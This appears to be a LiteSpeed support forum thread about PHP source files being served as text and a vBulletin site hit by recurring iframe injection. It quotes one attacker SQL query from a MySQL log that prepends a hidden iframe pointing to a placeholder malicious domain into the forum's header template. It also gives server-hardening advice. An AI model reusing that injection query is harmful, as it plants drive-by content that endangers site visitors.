Urgent security issue - php files are downloaded as text
- Thread starter LiteSpeeder
- Start date
When I saw this happen it was sending the output of the PHP file (and not the actual source) as a down-loadable file which wouldn't be a security issue but a nuisance. That is unless my memory is failing me!
Can you verify that it is actually sending the *source* of the file and not just the output?
Can you verify that it is actually sending the *source* of the file and not just the output?
In my case it sent the source. http://litespeedtech.com/support/forum/showthread.php?t=3389
I guess I could understand how the two are related, once the server runs out of available processors for PHP it doesn't process it and just sends the contents of the file as though it were HTML...
At any rate, realistically LSWS should have some sort of warning about this or in some way prevent it as it is a huge security issue especially if somebody goes to your config.php and holds down F5 on a few machines, they're bound to get the "download config.php" eventually.
At any rate, realistically LSWS should have some sort of warning about this or in some way prevent it as it is a huge security issue especially if somebody goes to your config.php and holds down F5 on a few machines, they're bound to get the "download config.php" eventually.
I've been suffering from an iframe attack for 10 days. My site is a mainly vBulletin site and a few addons. This is not a typical iframe injection to php files and i've already followed every iframe cleaning, iframe protection related suggestions (including formatting my pc, scanning my servers, changing password and restoring backups)
I've also disabled custom addons-script. But somehow, the hacker (or it may still be a virus) can add iframes to my templates.
The iframe is being injected via sql queries. Sample code from my mysql logs:
Now another big forum site is infected, too. I'm not alone. AND YES, THEY ARE USING LITESPEED like me!
This is the only way i can slowdown or stop the hacker-virus for a while:
-I remove the old database user from my database.
-I create a new database user.
-I edit my config.php and upload to server.
This way it doesn't add iframe to my header template for a few hours.. but then the same thing happens
Here's my theory: They can view my config.php as text and retrieve my database password from there.
There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.
Please help ASAP!
I've also disabled custom addons-script. But somehow, the hacker (or it may still be a virus) can add iframes to my templates.
The iframe is being injected via sql queries. Sample code from my mysql logs:
Code:
16905 Query UPDATE template SET template=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template), template_un=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template_un) where title='header'This is the only way i can slowdown or stop the hacker-virus for a while:
-I remove the old database user from my database.
-I create a new database user.
-I edit my config.php and upload to server.
This way it doesn't add iframe to my header template for a few hours.. but then the same thing happens
Here's my theory: They can view my config.php as text and retrieve my database password from there.
There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.
Please help ASAP!
Here's my theory: They can view my config.php as text and retrieve my database password from there.
There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.
Please help ASAP!
There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.
Please help ASAP!
skip-networking
to my.cnf's [mysqld] section.
Use phpmyadmin to check forum mysql user privileges, make sure that they can only access from localhost, and with password.
Change your vbulletin admin folder name.
Shut down ssh.
Rename wget.
Add that malicious domain name to LSWS to THE_REQUEST/POST_PAYLOAD Request Filtering Rules.
To make template database (FORUM_template) read-only, see http://www.linuxtopia.org/online_bo..._5.1_database_reference_guide/myisampack.html
You do not give any info what kind of system you run, is it shared/VPS or dedicated server, if you use Ensim, Cpanel or not, if you have NFS or other remote access to other servers etc. Building a secure system is not simple, but the keyword is "simplify".
I run Litespeed and a very large forum. I have SSH and FTP closed, I use private network, VPN and SSH2 (opened only for that 10 seconds when I log in) for communication with servers, my CP is Webmin, I use no vbulletin plugins or mods and database is only accessible from localhost. Simple and effective, fast, secure so far
Last edited:
Unfortunately some vbulletin directories (customavatars, customprofilepics) should be chmod 777. So i put htaccess files there including the lines below:
But i'm not sure if litespeed support these kind of .htaccess rules. How can i test this?
And please reply my other post, too http://www.litespeedtech.com/support/forum/showpost.php?p=17442&postcount=14
Code:
Options -Indexes
Options -ExecCGI
AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .html .shtml .sh .cgi
<Files ^(*.jpeg|*.jpg|*.png|*.gif)>
order deny,allow
deny from all
</Files>And please reply my other post, too http://www.litespeedtech.com/support/forum/showpost.php?p=17442&postcount=14